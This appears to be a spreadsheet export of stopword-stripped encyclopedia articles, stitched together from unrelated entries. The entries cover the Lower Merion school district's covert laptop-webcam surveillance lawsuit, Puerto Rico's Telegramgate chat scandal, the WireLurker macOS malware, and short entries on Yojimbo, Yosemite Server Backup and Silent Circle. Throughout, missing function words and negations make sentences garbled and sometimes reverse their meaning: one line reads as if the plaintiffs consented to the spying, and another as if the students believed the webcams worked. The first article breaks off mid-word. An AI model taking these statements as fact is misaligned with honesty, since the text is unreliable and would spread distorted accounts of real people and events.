laptops' webcams covertly students school property, thereby invading students' privacy. plaintiffs said consented spying.the defendants lower merion school district (lmsd) pennsylvania high schools part), nine-member board directors, superintendent (christopher mcginley). henry hockeimer, jr., ballard spahr lead counsel defendants. laptops covert cameras program beginning 2009–10 school year, school district issued individual apple macbook laptop computers 2,306 high school students. laptops in-school at-home use.it part school district's one-to-one initiative. program piloted september 2008 harriton high school expanded september 2009 lower merion high school. cost $2.6 million, less third covered grants. covert surveillance capability school loaded student's computer lanrev's remote activation tracking software. this included now-discontinued "thefttrack". while thefttrack enabled default software, program allowed school district elect activate enable whichever thefttrack's surveillance options school desired.the school elected enable thefttrack allow school district employees secretly remotely activate standard webcam featured apple laptops since 2006. that allowed school officials secretly take photographs webcam, whatever front line sight, send photographs school's server. system took sent photograph every minutes laptop thefttrack activated, though school employees could adjust timeframe one-minute intervals. lanrev disabled webcams uses (e.g., students unable photo booth video chat), students mistakenly believed webcams work all.in addition, thefttrack allowed school officials take screenshots, send school's server. furthermore, locating device would record laptop's internet (ip) address, enabling district technicians discover city laptop located internet service provider, though subpoena provider would required pinpoint exact location. addition, lanrev allowed school officials take snapshots instant messages, browsing, music playlists, written compositions.after sending image school's server, laptop programmed erase "sent" file created laptop. that way, would trace students might realize watched photographed. forwarded photos, screenshots, addresses stored school's server, purged school employee. clear schools access photos images. further, lanrev could programmed capture webcam pictures screen captures automatically, store laptop's hard disk later retrieval areas computer's storage accessible student, could deleted remotely.fred cate, director center applied cybersecurity research indiana university, said: "this classic definition spyware. it's imagine." eileen lake wynnewood, whose three children attend district schools, said: there's concern laptops misplaced stolen, install chip locate instead. there reason webcams purpose." marc rotenberg, georgetown university school information privacy professor president executive director electronic privacy information center (epic), said: "there less intrusive ways track stolen laptops, question it." purchase commenting now-discontinued thefttrack, carol cafiero (school district information systems coordinator, supervisor technicians administrative assistants) wrote boss virginia dimedio (district director technology number years, june 2009, member district superintendent's five-person cabinet) district network technician mike perbix "loves agree great product". perbix also raved spying capabilities thefttrack 2008 lanrev promotional webcast, saying "really, really" liked it.dimedio considered perbix cafiero's recommendations district purchase software, including memo cafiero noted mark student's laptop stolen lanrev server, laptop take screenshots pictures user built-in camera, transmit information back server." dimedio approved purchase installation $156,000 surveillance software. concealment surveillance school district intentionally publicize existence surveillance technology. also actively sought conceal it.the district inform students parents, communications (including district's promotion laptop program, guidelines laptops, individual contracts gave students sign), laptops gave district ability secretly take photographs whatever line sight student-issued laptop webcams, take screenshots; inform district would avail capabilities. district also adopt policies regarding thefttrack district employees.dimedio said "the district widely publicize feature 'for obvious reasons'". reportedly declined tell students thefttrack could "defeat purpose".perbix said "you're controlling someone's machine, want know doing". praised thefttrack youtube video produced, saying: "it's fantastic feature especially school environment". perbix maintained personal blog discussed computer oversight techniques, including cloak remote monitoring invisible user. concerns raised student intern august 2008, weeks district handed laptops students, harriton high school student interning school's department sent email dimedio, subject line: "1:1 concern (important)". said recently learned district's purchase lanrev, researched software. made "somewhat startling" discovery would allow school employees monitor students' laptops remotely. wrote: would find problem students informed possible, privacy's sake. however, appalling district inform parents students fact [w]hile feel access abused, feel enough ensure integrity students, even would knowing (especially end-users). feel would best students parents informed receive computers. could informing parents students fact causing huge uproar. dimedio responded: [t]here absolutely district tech people going monitor students home. going monitor student home, would stated think it—why would that? there purpose. police state. there would approve advocate monitoring students home. suggest take breath relax. dimedio forwarded e-mails district network technician perbix, suggested response student intern. with dimedio's approval, perbix e-mailed student intern, also dismissing student's concern: [t]his feature used track equipment reported stolen missing. information feature captures info network connected occasional screen/camera shots computer operated. tracking feature things like record browsing, chatting, email, type "spyware" features might thinking being student intern means privy things others rarely see, things might even work assure way, shape, form employ brother tactics, especially computers network. principal kline addition, members harriton high school student council twice privately confronted principal, steven kline, year prior suit. they concerned "that school could covertly photograph students using laptops' cameras". students particularly troubled momentary flickering webcams' green activation lights, several students reported would periodically turn camera use, signaling webcam turned student katerina perech recalled: really creepy." some school officials reportedly denied anything technical glitch, offered laptops examined students concerned. kline admitted school could covertly photograph students using laptops' cameras. students told worried privacy rights, asked whether school system read saved files computers, suggested minimum student body warned formally possible surveillance. action taken. robbins lawsuit covert surveillance october 2009, school district officials knew blake robbins, sophomore harriton high school, possession laptop taken home. day, nevertheless decided begin capturing webcam photos screenshots school-issued macbook, activating camera covertly. building-level technician kyle o'brien testified later, deposition, harriton high school assistant vice principal lindy matsko directed o'brien activate tracking. o'brien complied, e-mailing district network technician perbix, directing initiate thefttrack. deposition, matsko denied authorizing tracking.two hours later october perbix e-mailed o'brien know thefttrack running robbins' computer, perbix determined robbins' location. perbix wrote: "now currently online home." next day, perbix asked o'brien whether continue tracking laptop, o'brien responded "yes".over next days, school district captured least webcam photos screenshots. they included photos inside home robbins sleeping partially undressed, well photos father. district also snapped images robbins' instant messages video chats friends, sent servers. those images, however, reflected number images later recovered—during ensuing litigation district conceded unable recover week's worth images taken.on october perbix observed screenshots robbins, taken bedroom. four days later perbix showed boss, district director information systems george frazier. after discussing frazier, perbix shared images captured robbins' webcam screenshots harriton high school principal kline matsko. early november, number harriton high school administrators, including kline, matsko, assistant principal lauren marcuson, discuss images. according matsko, kline advised unless additional evidence giving contextual basis discuss images robbins parents, involved off-school-campus activities. however, matsko ultimately decided discuss certain images robbins parents.matsko called robbins office november 2009. showed photograph taken webcam embedded school-issued laptop, bedroom penn valley home. matsko indicated thought "proof", initially disciplined "improper behavior" (drug sales). parents contacted, told school officials officials mistaken. ultimately, robbins disciplined. robbins said matsko told district able activate webcam embedded student's laptop remotely time, view capture whatever image visible—without knowledge consent anyone webcam's line sight. after district counselor told account incident placed robbins' personal school file, however, family decided bring suit. complaint plaintiffs alleged that: many images captured intercepted consist images minors parents friends compromising embarrassing positions, including various stages dress undress. widely published photograph, robbins shown sleeping bed. hundreds photos taken 15-year-old also included standing shirtless getting shower, well photos father friends. included turned family week's worth images school district said able recover.the lawsuit claimed district's webcams violated united states constitution's guarantees privacy students families friends home, well pennsylvania common (expectation privacy) section 1983 u.s. civil rights (right privacy).it also accused officials spying "indiscriminate ability remotely activate webcams incorporated laptop", thereby violating fourth amendment constitution (right privacy) number electronic communications laws: u.s. electronic communications privacy (ecpa; intentional intercepts electronic communications), computer fraud abuse (cfaa; intentional access computer exceeds authorization obtain information), stored communications (sca; unauthorized acquisition stored electronic communications), pennsylvania wiretapping electronic surveillance (pwesa; intentional intercept electronic communications). initial response school district spokesman doug young announced february school district intended contest lawsuit. henry hockeimer, jr., four ballard spahr attorneys represented district.on february 2010, case made public, school district posted initial reply website asserting that: "the tracking-security feature limited taking still image operator operator's screen", "has used limited purpose locating lost, stolen, missing laptop." february district said statement parents "this includes tracking loaner computer that, regulations, might taken campus." complaint indicated whether robbins' laptop reported lost stolen, young said district could disclose fact. young asserted district never violated policy using remote-activation software find missing laptops.that day, district turned thefttrack tracked laptops, deleted pictures lanrev, noted 16th page subsequent forensics review. district also denied school administrator ever used photo taken school-issued laptop discipline student. vice principal reiterated statement video distributed national media february 2010.on february 2010, haltzman, robbins' counsel, told msnbc live robbins sitting home eating "mike ike" candy front school-issued laptop. attorney said vice-principal accused robbins taking illegal pills seeing eating candy webcam image. michael smerconish, philadelphia inquirer columnist reviewed photo, said fact appear size shape mike candy. haltzman said client's laptop reported stolen lost. lawyer also raised questions school system decided activate student's webcam, reasons.in statement press february 2010, robbins emphasized case undisclosed spying capabilities district covertly maintained. admissions, instances school district later admitted "serious mistakes" "misguided actions". also acknowledged monitoring system flawed, "not handled appropriately". district's superintendent admitted students parents informed secret spying feature, district said "notice given" students parents, district's failure "was significant mistake". school board president david ebby said: "it's big, horrible error judgment."the school district eventually acknowledged taken half images missing laptops recovered. computer forensics study commissioned defendants recovered 66,503 images produced lanrev, though able recover deleted district employees. district asserted evidence individual students specifically targeted. haltzman said: wish school district [had] come clean earlier, soon information waiting something filed court revealing extent spying".christopher null, technology writer yahoo! news, observed: "it's little difficult believe none material captured scandalous".the district also admitted robbins' case remote surveillance activated left running weeks, even though school officials knew laptop robbins' home. also admitted technology staff activated camera computer, gave images covertly took harriton high school principals.six days initiation lawsuit, district review privacy policies, school district disabled ability activate students' webcams remotely. lillie coney electronic privacy information center said: thought right, stopped."on february district suspended paid administrative leave staffers authorized activate remote monitoring, district 12-year veterans information systems coordinator cafiero network technician perbix. district indicated done precautionary measure, light roles activating thefttrack, ensuing investigation.in motion seeking examine cafiero's computer, excerpts emails amanda wuest, district desktop technician, surreptitious webcams cited technician emailed cafiero: "this awesome. it's like little lmsd soap opera", cafiero replied, know, love it". lawyer, charles mandracchia firm mandracchia mcwhirk llc, said turned webcam system requested school officials.when haltzman sought depose cafiero, fought effort questions deposition. however, u.s. district judge dubois refused quash haltzman's subpoena, ruling april 2010 cafiero information relevant case. first deposition, cafiero declined answer questions, citing fifth amendment right self-incrimination. however, interviewed april 2010, later deposition answered questions oath. others deposed included matsko, perbix, o'brien.in june july 2010, accordance order federal judge, dozens high school students notified counsel schools secretly photographed school authorities webcams. school district said 58,000 photos taken november 2008 february 2010 recovered school servers, exact number known number photos deleted district. students parents invited privately review photos taken, federal judge oversaw review process. cases, school said answer ordered surreptitious webcam activation, why. student reactions halpern, 15-year-old sophomore attends high school, told news, "everybody's pretty disgusted. think pretty despicable." many students said mostly used laptops bedrooms, rarely turned off. karen gotlieb, whose daughter attends school, said, received e-mail daughter, upset, saying, 'mom, laptop open room time, even changing.'" savanna williams, sophomore harriton, said always kept computer open, webcam exposed, changing bedroom, bathroom taking shower. said: like, 'mom, open time. this disturbing.'" mother said: "the possibility true complete violation privacy, entire home—not savanna. they option watch [me], husband, child. they violated trust."mother candace chacona said "flabbergasted" allegations: first thought daughter computer open almost around clock bedroom. spied on?" chuck barsh, insurance broker whose high school, called district's actions "gross invasion" student privacy, supported lawsuit, saying: "these people able look kids house". mike salmonson, father elementary school student, said matter "part institutional arrogance—a lack full disclosure honesty" part district administrators. reactions legal experts computer experts john palfrey, harvard school professor vice dean, co-director berkman center internet society cyberspace research center, said: facts appear claims student, shocking." david kairys, temple university school professor specializes civil rights constitutional author philadelphia freedom: memoir civil rights lawyer, described school district's policy "orwellian". said appeared "very clear civil-rights violation", continuing: "it's pretty outrageous. it's sort beyond belief say, 'this going far.'" susan friewald, university francisco school professor expert electronic privacy law, said: "they consent take photos [i]f school districts going [laptops] students, certainly concerned."witold "vic" walczak, legal director pennsylvania chapter american civil liberties union (not party lawsuit), commented: this kids explore sexuality, there's going room. this fodder child porn. joseph daly, retired 2009 lower merion police superintendent, told pictures snapped students' laptops, said: "that's illegal hell."lillie coney, associate director electronic privacy information center civil liberties public interest research center), said: "this definitely rational thing school engaged in", called outrageous invasion individual privacy". schwartz, vice president center democracy technology civil liberties public interest organization), said: "what [potential] abuse power higher-ups, trying find information head [parent-teacher association]? think privacy security consequences using kind technology, problems."kevin bankston, senior staff attorney specializing privacy electronic frontier foundation international digital rights advocacy legal organization), said: "i've never heard anything egregious. nobody would imagined schools would peer students' private homes, even bedrooms, without kind justification." continued: "this utterly shocking, blatant violation [the students' fourth amendment] constitutional rights. school district would right [use laptop's webcam] install secret listening devices textbooks issued students." suggested students tape lens laptop's camera. parry aftab, internet privacy lawyer executive director wiredsafety.org, said district committed clear violation several laws including fourth amendment.dan tynan, executive editor world author computer privacy annoyances (2005), said: "this extremely creepy, beyond purview school. there's really need take picture someone—in fact, prove person front laptop stole install stuff anyone's computer notify about, begging world pain." robert richardson, director computer security institute, said: "it's incredible realize playing fire." technology journalist robert cringely wrote infoworld: reason need take weeks' worth photos locate missing laptop, especially already ways tracking think cafiero issued rather interesting statement 15-year-old robbins reasonable expectation privacy" home, family paid insurance required school home loaners. words: dues, watch sleep. "creepy" already? lanrev, manufacturer software—which acquired absolute software, rebranded "absolute manage" february 2010—denounced software illegal purpose, emphasized theft recovery left enforcement professionals, criticized vigilantism. company denied knowledge complicity either perbix's district's actions. absolute software permanently disabled thefttrack next lanrev update. media reactions philadelphia inquirer columnist monica yant kinney wrote: school district techies peering private homes, even moment, guise locating lost laptop? even "surveillance society", almost beyond comprehension. newspaper, editorial, called school's decision remote camera feature "misguided", wrote "families every right shocked. anti-theft strategy, webcam tracking overkill—and even useful means. then failing disclose webcam huge gaffe, compounded lack policies safeguarding students' privacy." talk radio host philadelphia inquirer columnist michael smerconish added: [m]ost shocking [images] showing faces postings [classmates, friends, family members, parents] robbins communicating. what gave lower merion right invade privacy people? their images represent gross violation privacy, akin listening private telephone communication individuals, least absolutely idea presence interloper. that's real outrage inexcusable school district invade privacy third parties route violating blake robbins. pittsburgh post-gazette wrote editorial: "schools business jurisdiction homes students. district never business surveillance first place. tough laws needed prevent lower merion school districts going path again." york times, editorial, said: "conducting video surveillance students homes enormous invasion privacy. district really worried losing laptops, could used devices track whereabouts whatever did, school responsibility inform students accepted laptops, would also accept monitoring."technology writer gillmor, writing salon, said: "the case also reminds civil lawsuits play vital role society. sometimes, case, last line defense powerful institutions beat individuals. forget peril." motions; injunction legal fees granted haltzman filed emergency motion seeking injunction prevent school district reactivating referred "peeping-tom technology". pennsylvania chapter american civil liberties union (aclu) submitted amicus brief support student, arguing photo amounted illegal search. citing case regarding privacy unconstitutional searches, aclu's brief stated: "while placing camera inside students' laptops implicate fourth amendment, camera used search occurred that, absent warrant consent, violates fourth amendment (see united states karo)." witold "vic" walczak, aclu pennsylvania legal director, said: government official, police officer school principal, enter private home, physically electronically, without invitation warrant. case, officials entering foyer, child's bedroom. assuming allegations true, egregious invasion privacy. u.s. district court judge dubois granted haltzman's request february 2010, ordering district stop remotely activating cameras taking screenshots students' school-issued laptops, preserve relevant electronic data. while remote activation webcam deactivated, lanrev software removed. untrusting students high schools took taping laptops' webcams, even though school officials insisted stopped practice. may, revealed school secretly captured tens thousands webcam images screenshots, judge made school's secret webcam monitoring permanent.in addition, court issued order, prohibiting district officials discussing case students parents without first clearing communications plaintiffs' attorney.the class-action lawsuit sought class status grounds individual compensation small, therefore multiple parties would need share covering legal fees. july 2010, judge dubois issued order granting district second extension time respond plaintiffs' request class action certification.the judge issued order april 2010 granting haltzman's motion requiring cafiero haltzman make copies hard drives personal computers, determine whether cafiero used software students, transferred images computers. judge issued order may, requiring school officials arrange high school students parents images secretly taken laptops. judge dubois june 2010 ordered district share consultant robbins computer evidence, gathered investigation conducted lawyers computer experts hired defendants.the district suggested robbins 'loaner' laptop, paid insurance would permitted regular computer. 2009 letter parents, harriton high school principal kline said uninsured laptops permitted campus", said students paid insurance could loaner. asked robbins took loaner computer home without authorization, young declined comment. haltzman denied robbins ever notified computer problem, said robbins taken computer home "every single day" month. also pointed robbins students paid insurance fee, tracked.on august 2010, judge dubois ordered school district, losing party, plaintiffs' attorney legal fees related bringing action preliminary injunction school district's secret webcam monitoring, inasmuch plaintiffs successful "prevailing party" civil rights case. school district litigation insurance company school district insurance company, graphic arts mutual insurance company, filed federal lawsuits april 2010. they argued settlements district, district's related bills. ballard spahr also represented district insurance litigation.graphic arts asked declaratory judgment, would district's legal bills. insurance company contended none robbins' claims amounted "personal injury", defined covered district's million liability policy. district insurance company also accused breaching contract.the district, philadelphia's main line, pennsylvania's richest school systems. $193 million budget spent $21,600 student 2008–09, philadelphia region.the district billed $953,000 legal fees 2010 ballard spahr's four attorneys. addition, communications, computer consultant, billed district $240,000 2010 forensically analyzing district's computers. furthermore, june software company sungard billed district $32,000 help revise policies school-issued laptops. district also paying aggregate $200,000 salary employees suspended. judge side fully insurance company, district would also responsible paying costs litigation insurer.ultimately, insurance company agreed cover $1.2 million district's costs. defendants' report conclusions defendants commissioned 69-page report, prepared lawyers ballard spahr, firm school district hired defend robbins lawsuit. defendants' counsel nevertheless entitled 2010, report: "independent investigation".the report cited district inconsistent policies, shoddy recordkeeping, misstep misstep, "overzealous" technology "without apparent regard privacy considerations". secret surveillance, report remarked: "the wisdom propriety activating image tracking circumstances questionable best."the report said extent district board members, superintendent (who learned thefttrack meeting cabinet 2008), principals aware thefttrack's capabilities, "did appreciate potential ability raise serious privacy concerns, sought information advice" district lawyer. report also said school board members school administrators knew tracking place failed right questions regarding privacy issues, district lawyers probe legal considerations handing computers, administrators talk ramifications. noted harriton high school principal kline, example, learned thefttrack monitoring september 2008, said asked dimedio whether district advise students parents never revisited subject dimedio opined district would undermine thefttrack's effectiveness. report faulted district administrators staffers failing disclose mismanaging surveillance system, failing establish strict policies protect "unsuspecting" students' privacy.the report also found district officials knew robbins taken laptop home, still decided activate covert surveillance secretly captured hundreds webcam photos screenshots—included pictures robbins sleeping partially undressed, photo father, images instant messages photos friends robbins video-chatting. after program activated robbins' computer, district employee emailed another: "now currently online home".the report acknowledged investigators unable find explanations number tracking activations, district failed consider privacy implications. noted conflicting accounts district employees, gaps data, said evidence still gathered. report said covert cameras used missing computers unknown purposes, district left webcams activated long periods cases longer possible legitimate reason" capturing images. images recovered report attached computer forensics study indicating recovered 66,503 images produced lanrev instances school chose activate covert webcam snapshot screenshot feature, though investigators able recover images number deleted district employees. images recovered, report indicated 30,564 webcam photos 27,428 screenshots recovered lanrev server itself. report noted images covertly taken deleted district server intermittently march 2009 many photographs students, family members, others homes elsewhere. secret photos included number photographs males without shirts, content individuals appearing photographs might consider similarly personal nature".looking information available report found evidence thefttrack triggered laptops 2008–2010 time period. cases, school chose activate ip-address-tracking feature, activate feature triggered capture secret webcam snapshots screenshots. based available evidence, report found cafiero activated thefttrack times student laptops, perbix activated times. report noted number instances thefttrack left taking photos screenshots extended periods time even laptop considered missing stolen.in addition, activations student laptops investigators unable determine activated thefttrack, well activations investigators unable determine tracking initiated. together, resulted thousands photos screenshots. unexplained activations, cases investigators unable recover images remaining district record.it students laptops' covert surveillance mechani</t>
  </si>
  <si>
    <t>Telegramgate</t>
  </si>
  <si>
    <t>telegramgate, also known chatgate rickyleaks, political scandal involving ricardo rosselló, governor puerto rico, began july 2019, leak hundreds pages group chat messaging application telegram rosselló members cabinet. messages considered vulgar, racist, homophobic toward several individuals groups, discussed would media target potential political opponents. leak came midst allegations former secretary treasury puerto rico, raúl maldonado gautier, department boasted "institutional mafia" rosselló involved leaks also came year previous scandal, dubbed whatsapp gate, involving members rosselló's cabinet.mass protests arose, reaching 1,000,000 people single event july july million protesters shut expreso américas, 11-lane highway. while several staff resigned wake, rosselló initially refused resign governor simply resigned president governing pro-statehood progressive party july said would seek re-election 2020 puerto rico gubernatorial election. july eleven consecutive days protests, near fortaleza, governor's residence juan. july rosselló announced would resign governor august august pedro pierluisi, former resident commissioner puerto rico sworn immediately rosselló left office, later ordered supreme court puerto rico abandon, since swearing-in constitutional. ultimately, secretary justice puerto rico, wanda vázquez garced, initially reluctant take office, sworn governor puerto rico. became second woman assume office first person take position succession democratic election. telegram chat dialog july 2019, small segment telegram chat messages ricardo rosselló various members cabinet, former advisors, former campaign managers leaked spread local press. full 889-page copy conversations published july local investigative news agency puerto rico center investigative journalism.among identified chat logs are: ricardo rosselló, governor puerto rico christian sobrino, governor's representative promesa board ramón rosario, secretary public affairs fortaleza (governor's residence) elías sánchez, 2016 political campaign director, lobbyist rafael cerame, communications consultant carlos bermúdez, communications consultant ricardo llerandi, chief staff governor alfonso orona, legal counsel governor anthony maceira, secretary public relations edwin miranda, publicist, founder advertising agency raúl maldonado gautier, secretary treasury luis rivera marín, secretary statethe chat messages found general public vulgar, homophobic racist described "bro" culture among group. chat members referred york city council member melissa mark-viverito "whore", made homophobic remarks ricky martin, called juan mayor carmen yulín cruz "una tremenda [hija puta]" transl. total daughter bitch". chats revealed plans control media smear political opponents, rosselló shared confidential state information non-government officials chat.other parts conversations joked deaths hurricane maria. when interviewed democracy july 2019, carla minet puerto rico center investigative journalism stated jokes particularly painful many puerto ricans unable properly bury dead chaotic days followed hurricane maria, reading chats governor mentioned "cadavers", stop others joking dead, seen unforgivable betrayal. impact government after raúl maldonado gautier vacated post, rosselló nominated francisco parés alicea position secretary treasury july functioning interim time assistant secretary internal revenue prior taking interim. confirmed senate week later assumed office july rosselló announced resignation governor. prior full log's publication, july 2019, 32-count federal indictment resulted federal bureau investigation (fbi) arresting people, including former high-ranking puerto rico government officials served rosselló's government, charges conspiracy crimes connection millions dollars federal medicaid education funds. rosselló vacationing france time leaks july forced return island.several members rosselló's cabinet, involved part chat conversations, resigned following publication document. luis rivera marín christian sobrino resigned positions government july addition, press secretary dennise peréz resigned july chief staff ricardo llerandi followed suit july july puerto rico department justice ordered participants interviewed phones inspected. would neither confirm deny investigating involved. july house representatives puerto rico formed impeachment committee, members three attorneys appointed house leader carlos "johnny" méndez, consider whether rosselló committed impeachable offenses based chat log. july judge issued order requiring participants conversation surrender phones, seized. july committee recommended five articles impeachment governor rosselló. july secretary public affairs, anthony maceira, resigned. resignation rosselló july rosselló announced would seek re-election 2020 puerto rico gubernatorial election, initially refused resign governor. also announced resignation president progressive party. however, three days later, rosselló announced would resign governor, effective august 2019, 5:00 p.m. ast, replaced justice secretary wanda vázquez garced, who, time, next eligible cabinet member become rosselló's successor; rosselló's immediate cabinet members either resigned relieved positions rosselló. treasury secretary, pares alicea would next succeed, meet required minimum case, next line secretary justice vázquez garced, announced tweet interested becoming governor hopes rosselló appoints someone last day. succession before rosselló's resignation effective, announced nomination pedro pierluisi position secretary state july intention succeed office governor puerto rico. pierluisi, former resident commissioner puerto rico luis fortuño administration former secretary justice puerto rico pedro rosselló administration, ricardo rosselló's former adversary 2016 primaries party, resulted rosselló's victory pierluisi progressive party's nominee governor puerto rico 2016 general elections. that that, pierluisi sworn acting secretary state, document additional pages controversial chat released journalist sandra rodríguez cotto. next day, august senate puerto rico denied pierluisi confirmation rosselló's resignation, thus preventing becoming acting governor.after confirmation hearings, pierluisi confirmed secretary state house representatives august senate still conduct ratification confirm pierluisi secretary state. however, sworn governor puerto rico august 5:00 p.m. ast, immediately rosselló's term ended, despite confirmed senate. relying stated legislature recess, nomination legitimate legislature goes back labor. result, president senate, thomas rivera schatz, challenged legitimacy ascent office supreme court puerto rico. protests continued, main focus shifting calling pierluisi's resignation. supreme court ruled ascent power unconstitutional. afterwards, then-secretary justice, wanda vázquez sworn governor puerto rico, becoming second woman assume office first person take position succession democratic election. unidos puerto rico controversy july 2019, among calls husband resign scandal stemming involvement incriminating group chat, wife, first lady beatriz rosselló, criticized management unidos puerto rico (transl. united puerto rico), non-profit organization created hurricane maría investigation fbi. first lady pointed delayed distribution disaster relief supplies. august 2018, least trailers held supplies found abandoned near state election office; according york times, "broke[n] open became infested rats". spokeswoman elections commission said offices used storage point request first lady. raúl "rauli" maldonado nieves, former treasury secretary raúl maldonado gautier, claimed present meeting ricardo rosselló demanded amendment audit report containers according maldonado nieves, report would "affected" first lady. opened investigation finances donation requests unidos puerto rico handle hurricane maria-related donations. unidos puerto rico, received million donations, time jorge pino, brother-in-law lobbyist elías sánchez, also involved group chat scandal. investigation august 2020, executive director puerto rico government ethics office announced investigation leaked 889-page chat dialog rosselló members cabinet completed. investigation, began july 2019, closed inability authenticate evidence, essential element imputation unethical conduct, rendering impossible administrative prosecution participants. part investigation process, ethics office's lawyers interviewed seven witnesses, including chat participants, affidavits taken. additionally, chat participants contacted, declined cooperate investigation. witnesses interviewed admitted instant-messaging application telegram main form communication rosselló members cabinet declined authenticate content leaked document, expressing malevolous alterations presented ethics office's lawyers attempted prove authenticity content conversations certification request instant-messaging company itself, unsuccessful; company limited release information suspicion terrorism relevant authorities, address telephone number, content conversations. department justice puerto rico also asked cooperate providing extracted information cell phones chat's participants, purpose obtaining unaltered authentic content directly source, shared criminal investigation they're still conducting.on november 2020, special prosecutors handed investigation rosselló administration's involvement chat scandal special independent prosecutor's panel, days redacting document. ultimately, november 2020, panel determined criminal elements crimes described report, lack evidence sustain accusations, adding loss public funds damage public property. panel also find content chat carrying crime. reactions civilian protests calling governor resign began upon return puerto rico france july 2019, continued july july protest juan attendance 500,000 people peak. protests also held municipalities, cities, countries. another protest held juan july also drew hundreds thousands reported protest record, news estimating crowd size potentially million (ast). crowd size reported eclipsed previous record protestors gathered 2004 denounce navy training missions island-municipality vieques.many protested creative ways, yoga, holding signs scuba diving water, horse-back, drumming, face-painting, group prayers, public demonstration reminders died hurricane maría. july cacerolazo (transl. mass-banging pots pans), people across islands banged pots pans, demanding resignation. banging pots pans method protesting latin american nations past. puerto rico residents timing banging pots pans p.m. night. song, "afilando cuchillos", (transl. sharpening knives) lyrics bunny, residente, ile, released protests.after rosselló announced resignation, song boté" (transl. dumped you) sung protesters happily ripped posters image dumped garbage bins. perreo, doggy-style dancing reggaeton music mentioned people puerto rico contributing governor leaving office; pedro rosselló, ricardo's father, criminalized reggaetón term governor puerto rico (1993–2001) length record store employees arrested selling genre's music. after resignation announcement, celebrations took place front fortaleza people dancing perreo, weeks protesting demands. political congressman raúl grijalva (d-arizona), chair house natural resources committee, oversees puerto rico policy, called governor resign amid scandal. jenniffer gonzález, puerto rico's sole representative congress, said thought rosselló seek re-election following year result incident. thomas rivera schatz, president senate puerto rico, took twitter facebook call upon rosselló every government official included chat resign; carlos "johnny" méndez, speaker house representatives puerto rico, same. july former governor sila maría calderón called upon rosselló resign well former governor luis fortuño published letter social media. july former antonio mayor secretary housing urban development julian castro became first 2020 democratic presidential candidate call rosselló's resignation, followed fellow presidential contenders, democratic congresswoman tulsi gabbard senator bernie sanders. 2020 primaries puerto rico primary elections held august 2020, among nationwide controversy puerto rico state commission elections' inability deliver voting ballots time august governor wanda vázquez garced former resident commissioner pedro pierluisi progressive party nomination governor puerto rico, resulting latter winner. 2020 general elections 2020 puerto rico gubernatorial elections held november 2020, candidates running office governor puerto rico. former resident commissioner pedro pierluisi, ricardo rosselló chose succeed governor puerto rico latter announced resignation, declared winner puerto rico state commission elections. with almost votes, pierluisi's victory announced five days controversial scrutiny, later discovery various briefcases filled unaccounted ballots votes filled sworn governor puerto rico january 2021, constitution puerto rico. references</t>
  </si>
  <si>
    <t>Wirelurker</t>
  </si>
  <si>
    <t>wirelurker family malware targeting macos systems. malware designed target users china apple mobile desktop devices. malware suspected infecting thousands chinese mobile devices. security firm palo alto networks credited uncovering malware. works wirelurker monitors device connected infected macos computer installs downloaded third-party applications automatically generated malicious applications onto device. wirelurker infect device regardless whether jailbroken not. wirelurker complex form malware utilizes techniques file hiding, code obfuscation encryption. wirelurker capable stealing variety information mobile devices infects regularly requests updates attackers command control server. arrests three individuals china arrested suspicion creating distributing wirelurker malware. suspects, identified surnames wang, chen taken custody thursday november 2014. chinese authorities believe suspects created malware financial gains. protection several steps taken order protect wirelurker malware. install software applications unknown unreliable sources. make sure system preferences ‘allow apps downloaded from: store identified developers’. keep security software date desktop. keep software date mobile device. connect mobile device unknown computers. references external links palo alto networks research center</t>
  </si>
  <si>
    <t>Yojimbo (software)</t>
  </si>
  <si>
    <t>yojimbo personal information manager macos bare bones software. store notes, images media, urls, pages, passwords. yojimbo also encrypt contents store password keychain. bare bones' second cocoa application. history yojimbo first released january 2006. time, bare bones called completely information organizer". references external links yojimbo homepage</t>
  </si>
  <si>
    <t>Yosemite Server Backup</t>
  </si>
  <si>
    <t>yosemite server backup (ysb) cross-platform backup software developed barracuda networks, inc. after acquiring yosemite technologies, barracuda networks released yosemite server backup first offering barracuda ware line products. 64-bit systems, could back hard disks tapes. yosemite server backup longer stand alone package sept. 2017. part barracuda backup. references</t>
  </si>
  <si>
    <t>Silent Circle (software)</t>
  </si>
  <si>
    <t>silent circle encrypted communications firm based washington silent circle provides multi-platform secure communication services mobile devices desktop. launched october 2012, company operates subscription business model. encryption part software used free software/open source peer-reviewed. remaining parts silent phone silent text, source code available github, proprietary software licenses. history november 2011, mike janke called phil zimmermann idea kind private, secure version skype. zimmermann agreed project called callas, co-founder corporation vincent moscaritolo. janke brought security expert hyder, founding team established. company founded caribbean island nevis, moved headquarters grand-saconnex near geneva, switzerland 2014 search country "stronger privacy laws protect customers' information."on august 2013, website, silent circle announced silent mail service would shut down, company could "see writing wall" felt possible sufficiently secure email data looming threat government compulsion precedent lavabit shutdown before.in january 2015, silent text serious vulnerability allowed attacker remotely take control blackphone device. potential attacker needed know target’s silent circle number phone number. blackphone silent circle patched vulnerability shortly disclosed.in march 2015 controversy information security specialist hacker khalil sehnaoui identified silent circle's warrant canary removed site.in january 2017 gregg smith named renewed focus serving large business space well government entities. time tony cole, global government fireeye, named board directors. shortly smith became ceo, company moved back switzerland united states. reception november 2014, silent phone silent text received scores electronic frontier foundation's secure messaging scorecard, along "chatsecure orbot", cryptocat, textsecure, "signal redphone". they received points communications encrypted transit, communications encrypted keys providers access (end-to-end encryption), making possible users independently verify correspondent's identities, past communications secure keys stolen (forward secrecy), code open independent review (open source), security designs well-documented, recent independent security audits.however, august 2020, page secure messaging scorecard states date used privacy- security-related decision-making. products company's products enable encrypted mobile phone calls, text messaging, video chat. current current products include following: silent phone: encrypted voice calls, video calls text messages mobile devices. currently available ios, android, silent circle’s silent blackphone. used wi-fi, edge, cellular anywhere world. discontinued discontinued products include following: blackphone: smartphone designed privacy created silent circle built technologies, joint venture silent circle geeksphone. there news updates since 2018. privatos discontinued june 2016. gosilent: personal firewall integrated cloud analytics. product introduced silent circle acquired maryland start-up kesala. sold silent circle's owner 2018 silent text: discontinued september 2015. stand-alone application encrypted text messaging secure cloud content transfer “burn notice” feature permanently deleting messages devices. features merged silent phone. silent mail: discontinued august 2013. silent mail used offer encrypted email silent circle’s private, secure network compatibility popular email client software. business model company privately funded operates subscription business model. also comparison instant messaging clients comparison voip software silent circle instant messaging protocol crypto phone references further reading gibbs, samuel july 2016). know people care privacy, it?". guardian. external links official website</t>
  </si>
  <si>
    <t>Yandex Disk</t>
  </si>
  <si>
